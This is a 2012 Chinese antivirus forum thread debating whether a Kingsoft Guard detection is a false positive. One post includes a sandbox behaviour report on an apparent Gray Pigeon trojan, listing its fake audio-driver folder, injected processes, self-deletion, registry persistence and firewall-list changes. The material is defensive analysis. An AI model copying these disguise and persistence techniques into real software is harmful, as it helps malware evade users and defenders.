楼主: 家渝
收起左侧

[误报文件] 金山卫士 误报?

  [复制链接]
cfans
发表于 2012-6-20 13:16:55 | 显示全部楼层
/tiao眼镜鱼 发表于 2012-6-20 13:10
金山工作人员说有毒

本来就是有毒啊  已经上传火眼了。
cfans
发表于 2012-6-20 13:18:58 | 显示全部楼层
maomao110 发表于 2012-6-20 11:59
看名字就知道是误报

不能这样说,

realaudo   正常软件没有这个目录,而且这个东西分析下文件 就知道是病毒了
cfans
发表于 2012-6-20 13:20:35 | 显示全部楼层
wuyongliang 发表于 2012-6-20 10:54
这事误报驱动啊

请看了文件 再说 不要妄下结论。
cfans
发表于 2012-6-20 13:31:53 | 显示全部楼层
这个病毒 疑似 灰鸽子 程序,

详见 金山火眼分析
https://fireeye.ijinshan.com/ana ... a88e1e7ce2e3e865e58
/tiao眼镜鱼
发表于 2012-6-20 13:45:27 | 显示全部楼层
cfans 发表于 2012-6-20 13:31
这个病毒 疑似 灰鸽子 程序,

详见 金山火眼分析

你有火眼邀请码??怎么得到的???
jayavira
发表于 2012-6-20 13:52:15 | 显示全部楼层
                  .__  ___.                  
   _____  _____   |  | \_ |__    ____ ___  ___
/     \ \__  \  |  |  | __ \  /  _ \\  \/  /
|  Y Y  \ / __ \_|  |__| \_\ \(  <_> )>    <
|__|_|  /(____  /|____/|___  / \____//__/\_ \
       \/      \/           \/              \/
                                                     
=====Sample Summary=====
File name: sample.exe
MD5: F1101D3B53A0BA88E1E7CE2E3E865E58
SHA1: 9BCB0D03AC8EBAD2412829765A4532AAAF6E35D1
SHA256: E46B3C01A1BF1F27324FD73D7C2F4E7E8CA815D55113ACFAE588E4A84312F324

=====Major Threats=====

=====Behavior Details=====

Create process:
sample.exe --> C:\Program Files\RealAudo\Ac97\GooglePinying.exe
sample.exe --> C:\WINDOWS\system32\cmd.exe
GooglePinying.e --> C:\WINDOWS\system32\ipconfig.exe
GooglePinying.e --> C:\WINDOWS\system32\netsh.exe
GooglePinying.e --> C:\WINDOWS\system32\net.exe
net.exe --> C:\WINDOWS\system32\net1.exe
GooglePinying.e --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\xqcqpj.tmp
xqcqpj.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cdg491~tmp\_RND_1.tmp\xhuupc.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gfz492~tmp\_RND_2.tmp\xhuupc.tmp
xhuupc.tmp --> C:\WINDOWS\system32\svchost.exe
svchost.exe --> C:\WINDOWS\system32\wbem\wmiprvse.exe

Create remote thread:
sample.exe --> GooglePinying.e
sample.exe --> cmd.exe
GooglePinying.e --> ipconfig.exe
GooglePinying.e --> netsh.exe
GooglePinying.e --> net.exe
net.exe --> net1.exe
GooglePinying.e --> xqcqpj.tmp
xqcqpj.tmp --> xhuupc.tmp
xhuupc.tmp --> svchost.exe
svchost.exe --> wmiprvse.exe

Create file:
sample.exe --> C:\Program Files\RealAudo
sample.exe --> C:\Program Files\RealAudo\Ac97
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau21.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau22.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau23.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau24.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau25.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau26.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau27.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau28.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau29.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau30.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\RtlCPAPI.dll
sample.exe --> C:\Program Files\RealAudo\Ac97\ALSndMgr.cpl
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxwdm1.cat
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxwdm0.cat
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcwdm6.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\GooglePinying.exe
GooglePinying.e --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp
GooglePinying.e --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp
GooglePinying.e --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\xqcqpj.tmp
xqcqpj.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cdg491~tmp
xqcqpj.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cdg491~tmp\_RND_1.tmp
xqcqpj.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cdg491~tmp\_RND_1.tmp\xhuupc.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gfz492~tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gfz492~tmp\_RND_2.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gfz492~tmp\_RND_2.tmp\xhuupc.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vfr493~tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vfr493~tmp\_RND_3.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vfr493~tmp\_RND_3.tmp\vsionet.exe
wmiprvse.exe --> C:\WINDOWS\TEMP\Perflib_Perfdata_2bc.dat

Delete file:
cmd.exe --> C:\WINDOWS\system32\vddwewe12dasdw.ded
cmd.exe --> C:\sample.exe
cmd.exe --> C:\WINDOWS\system32\dewdcedfasdfd.bat
svchost.exe --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\xqcqpj.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vfr493~tmp\_RND_3.tmp\vsionet.exe
cmd.exe --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\vddwewe12dasdw.ded
cmd.exe --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\dewdcedfasdfd.bat

Create key:
sample.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Local AppWizard-Generated Applications
sample.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Local AppWizard-Generated Applications\install
sample.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Local AppWizard-Generated Applications\install\Recent File List
sample.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Local AppWizard-Generated Applications\install\Settings
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier
ipconfig.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT
ipconfig.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Multimedia\Audio
ipconfig.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Multimedia\Audio Compression Manager
ipconfig.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Multimedia\Audio Compression Manager\MSACM
ipconfig.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Multimedia\Audio Compression Manager\Priority v4.00
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV
GooglePinying.e --> \REGISTRY\USER\.DEFAULT\Software\Local AppWizard-Generated Applications
GooglePinying.e --> \REGISTRY\USER\.DEFAULT\Software\Local AppWizard-Generated Applications\install
GooglePinying.e --> \REGISTRY\USER\.DEFAULT\Software\Local AppWizard-Generated Applications\install\Recent File List
GooglePinying.e --> \REGISTRY\USER\.DEFAULT\Software\Local AppWizard-Generated Applications\install\Settings
GooglePinying.e --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
svchost.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\LocalConfig
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\LocalConfig\Enroll
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\LocalConfig\Enroll\HcsGroups
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\Shas
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\Qecs
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\LocalConfig\UI
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\MediaProperties
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\MediaProperties\PrivateProperties
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\MediaProperties\PrivateProperties\Joystick
wmiprvse.exe --> \REGISTRY\USER\S-1-5-20\Software\Microsoft\Multimedia\Audio
wmiprvse.exe --> \REGISTRY\USER\S-1-5-20\Software\Microsoft\Multimedia\Audio Compression Manager
wmiprvse.exe --> \REGISTRY\USER\S-1-5-20\Software\Microsoft\Multimedia\Audio Compression Manager\MSACM
wmiprvse.exe --> \REGISTRY\USER\S-1-5-20\Software\Microsoft\Multimedia\Audio Compression Manager\Priority v4.00
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
svchost.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy
svchost.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch

Delete key:
GooglePinying.e --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Local AppWizard-Generated Applications\install\Recent File List
GooglePinying.e --> \REGISTRY\USER\.DEFAULT\Software\Local AppWizard-Generated Applications\install\Recent File List

Set value key:
sample.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [C8 B7 B1 5B 9C B9 0C B3 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [B9 31 47 40 B2 0B D3 B0 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [01 BB 67 BF 3D 76 F8 59 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\LogSessionName ["stdout"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\Active [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\ControlFlags [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier\Guid ["5f31090b-d990-4e91-b16d-46121d0255aa"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier\BitNames [" Error Unusual Info Debug"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\LogSessionName ["stdout"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\Active [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\ControlFlags [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier\Guid ["5f31090b-d990-4e91-b16d-46121d0255aa"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier\BitNames [" Error Unusual Info Debug"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\LogSessionName ["stdout"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\Active [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\ControlFlags [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier\Guid ["8aefce96-4618-42ff-a057-3536aa78233e"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier\BitNames [" Error Unusual Info Debug"]
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile ["C:\WINDOWS\system32\ESENT.dll"]
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile ["C:\WINDOWS\system32\ESENT.dll"]
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryCount [0x10]
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\TypesSupported [0x7]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [2C B2 54 F7 24 42 C0 C4 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [66 91 B7 03 27 70 A9 14 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [9E 7B 1B DE 67 A7 57 5C ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [60 6A F4 01 A1 E8 79 CA ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [6A 6D 4B 7F 18 10 44 67 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [99 F4 F2 06 A1 77 FD 97 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [2C D2 D7 63 73 77 81 10 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\DIUG ["hfzOToTQZMd3duug/vlYVwoLXJ9XolCCoyBUVwhAJ1Q="]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\CAM ["hfzOToTQZMd3duug/vlYVwoLXJ9XolCCoyBUVwhAJ1Q="]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\P1 ["1PmIF9aE"]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\P2
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\P3
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\CTC ["gA=="]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\ISO ["gA=="]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\VSO ["gA=="]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [5D B3 9F 3C F1 8D 26 E4 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [2E 5D AC C5 8E 80 43 E0 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [C6 AC BA 8D 30 41 D8 BD ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [15 C1 D2 04 70 73 F9 98 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [B5 7D B0 7D 56 DD D1 DB ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [30 0C 60 FE 98 19 62 93 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [2B 80 01 A8 3F AE DF 19 ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [C2 86 A0 43 26 8C BE 76 ...]
net.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [6B 4C 68 08 E8 42 6E 49 ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [DA A8 FF E7 47 5C FA E7 ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [88 E8 88 47 F4 9F 0B EE ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [1A 59 B9 B3 3B 16 CF 3E ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [85 06 94 B9 CE 16 BD D7 ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [AA 07 1C 15 AE 66 82 37 ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [F6 D1 47 DD AC 0E F8 7E ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [8E DE 86 65 EA AC EE FE ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [0B 1C BD 14 C7 26 A4 26 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [F7 6B 61 74 16 38 E6 8A ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [C5 2F 48 2D 71 6D 61 93 ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [1F CE FF B8 1E FB F2 B3 ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [5F E9 D9 2C E0 39 85 47 ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [6C B0 52 74 8B 2C 6C F6 ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [F3 4A B3 F0 FB 65 40 6B ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [5F 18 FD A2 B1 0A 19 8C ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [02 63 2F EB 85 52 08 0B ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\EnableFileTracing [0x0]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\EnableConsoleTracing [0x0]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\FileTracingMask [0xFFFF0000]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\ConsoleTracingMask [0xFFFF0000]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\MaxFileSize [0x100000]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\FileDirectory ["%windir%\tracing"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [37 50 55 39 DF 0F 31 3A ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\StacSV\CTC ["hqg="]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Paths [0x4]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache1"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache2"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache3"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache4"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CacheLimit [0xC02E]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CacheLimit [0xC02E]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CacheLimit [0xC02E]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CacheLimit [0xC02E]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies ["C:\Documents and Settings\Administrator\Cookies"]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\History ["C:\Documents and Settings\Administrator\Local Settings\History"]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\LogSessionName ["stdout"]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Active [0x1]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\ControlFlags [0x1]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr\Guid ["710adbf0-ce88-40b4-a50d-231ada6593f0"]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr\BitNames [" NAP_TRACE_BASE NAP_TRACE_NETSH"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [FD B0 EA 83 82 2A DD CC ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [4B 63 CE FE 23 CD DA AA ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [11 6E 67 EC 51 EE 77 7B ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [9A B7 C9 18 EF 5F 1C 21 ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [58 2E DA A7 0D 09 AE B0 ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [F8 33 84 44 B3 50 A4 DD ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [09 3B 27 67 68 64 F5 58 ...]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable [0x0]
svchost.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable [0x0]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings [3C 00 00 00 1D 00 00 00 ...]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass [0x1]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName [0x1]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet [0x1]
